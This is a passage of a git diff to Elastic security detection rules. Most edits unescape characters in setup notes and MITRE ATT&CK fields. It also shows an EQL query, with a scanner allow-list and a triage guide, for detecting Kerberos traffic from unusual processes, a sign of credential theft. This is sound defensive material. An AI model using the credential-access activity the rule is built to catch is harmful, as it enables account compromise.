(such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_103.json b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_103.json index 2a4acf5e242..f3f1858f75a 100644 --- a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_103.json @@ -52,7 +52,7 @@ ], "risk_score": 21, "rule_id": "88817a33-60d3-411f-ba79-7c905d865b2a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_104.json b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_104.json index 308da8dbfc6..8c498475dd4 100644 --- a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_104.json @@ -52,7 +52,7 @@ ], "risk_score": 21, "rule_id": "88817a33-60d3-411f-ba79-7c905d865b2a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_105.json b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_105.json index 013f0cf54f8..2e3a59fe0a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_105.json @@ -51,7 +51,7 @@ ], "risk_score": 21, "rule_id": "88817a33-60d3-411f-ba79-7c905d865b2a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_106.json b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_106.json index 4b1f586a4e9..caf09930efa 100644 --- a/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/88817a33-60d3-411f-ba79-7c905d865b2a_106.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_1.json b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_1.json index f2aa683a515..e9155b007f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_1.json +++ b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_1.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_103.json b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_103.json index 9e6a5ac4bef..e7e4faa7b30 100644 --- a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_103.json +++ b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_103.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_104.json b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_104.json index e7b2992de64..55cdb791303 100644 --- a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_104.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_2.json b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_2.json index 5cd89480024..0628445de05 100644 --- a/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_2.json +++ b/packages/security_detection_engine/kibana/security_rule/88fdcb8c-60e5-46ee-9206-2663adf1b1ce_2.json @@ -48,7 +48,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -70,7 +70,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_103.json b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_103.json index ff262007fdc..de77f4246c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_103.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_104.json b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_104.json index 0c5515ddaa5..1347c4b9544 100644 --- a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_104.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_105.json b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_105.json index bf3e9727472..4e4784b8d1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_105.json @@ -63,7 +63,7 @@ ], "risk_score": 21, "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_106.json b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_106.json index 9141cf17fcb..8e3e4956440 100644 --- a/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/891cb88e-441a-4c3e-be2d-120d99fe7b0d_106.json @@ -62,7 +62,7 @@ ], "risk_score": 21, "rule_id": "891cb88e-441a-4c3e-be2d-120d99fe7b0d", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_104.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_104.json index a2fb9ef0b35..6deaf53015c 100644 --- a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_104.json +++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_104.json @@ -16,8 +16,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Kerberos Traffic from Unusual Process", - "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port \u003e= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", "related_integrations": [ { "package": "endpoint", @@ -72,7 +72,7 @@ ], "risk_score": 47, "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_105.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_105.json index 24eef96a671..083d92e69ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_105.json +++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_105.json @@ -16,8 +16,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Kerberos Traffic from Unusual Process", - "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - 